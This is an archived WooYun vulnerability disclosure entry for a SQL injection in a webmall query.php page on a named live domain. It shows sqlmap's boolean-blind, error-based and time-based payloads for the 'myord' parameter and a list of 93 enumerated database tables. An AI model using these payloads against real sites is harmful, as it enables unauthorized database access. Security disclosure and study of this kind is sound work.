乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-10: 细节已通知厂商并且等待厂商处理中 2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开
http://zzjz2.edong.com/webmall/query.php?catid=0&imageField=&key=1&myord=1&typeid=0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: myord Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: catid=0&imageField=&key=1&myord=1 RLIKE (SELECT (CASE WHEN (4263=4263) THEN 1 ELSE 0x28 END))&typeid=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: catid=0&imageField=&key=1&myord=1 AND (SELECT 1655 FROM(SELECT COUNT(*),CONCAT(0x7168676a71,(SELECT (CASE WHEN (1655=1655) THEN 1 ELSE 0 END)),0x7169636a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&typeid=0 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: catid=0&imageField=&key=1&myord=1 AND SLEEP(5)&typeid=0---web application technology: Apache, PHP 5.2.17back-end DBMS: MySQL 5.0Database: zzjz2phpweb[93 tables]+--------------------------+| pwn_advs_duilian || pwn_advs_lb || pwn_advs_lbgroup || pwn_advs_link || pwn_advs_linkgroup || pwn_advs_logo || pwn_advs_movi || pwn_advs_pic || pwn_advs_pop || pwn_advs_text || pwn_base_admin || pwn_base_adminauth || pwn_base_adminmenu || pwn_base_adminrights || pwn_base_border || pwn_base_coltype || pwn_base_config || pwn_base_pageset || pwn_base_pagetemp || pwn_base_plus || pwn_base_plusdefault || pwn_base_plusplan || pwn_base_plusplanid || pwn_base_plustemp || pwn_base_version || pwn_comment || pwn_comment_cat || pwn_comment_config || pwn_down_cat || pwn_down_con || pwn_down_config || pwn_down_downlog || pwn_down_pages || pwn_down_pcat || pwn_down_proj || pwn_down_prop || pwn_maq || pwn_maq_cat || pwn_maq_config || pwn_member || pwn_member_buylist || pwn_member_cat || pwn_member_centlog || pwn_member_centrule || pwn_member_centset || pwn_member_config || pwn_member_defaultrights || pwn_member_fav || pwn_member_friends || pwn_member_group || pwn_member_msn || pwn_member_notice || pwn_member_nums || pwn_member_onlinepay || pwn_member_pay || pwn_member_paycenter || pwn_member_regstep || pwn_member_rights || pwn_member_secure || pwn_member_type || pwn_member_zone || pwn_menu || pwn_menu_group || pwn_news_cat || pwn_news_con || pwn_news_config || pwn_news_downlog || pwn_news_pages || pwn_news_pcat || pwn_news_proj || pwn_news_prop || pwn_page || pwn_page_group || pwn_tools_code || pwn_tools_photopolldata || pwn_tools_photopollindex || pwn_tools_pollconfig || pwn_tools_polldata || pwn_tools_pollindex || pwn_tools_statbase || pwn_tools_statcome || pwn_tools_statcount || pwn_tools_statdate || pwn_webmall_config || pwn_webmall_goods || pwn_webmall_iorder || pwn_webmall_modules || pwn_webmall_spool || pwn_webmall_spoolmod || pwn_webmall_tempcat || pwn_webmall_temptype || pwn_webmall_tmod || pwn_webmall_torder |+--------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-08-15 11:18
漏洞Rank:4 (WooYun评价)
暂无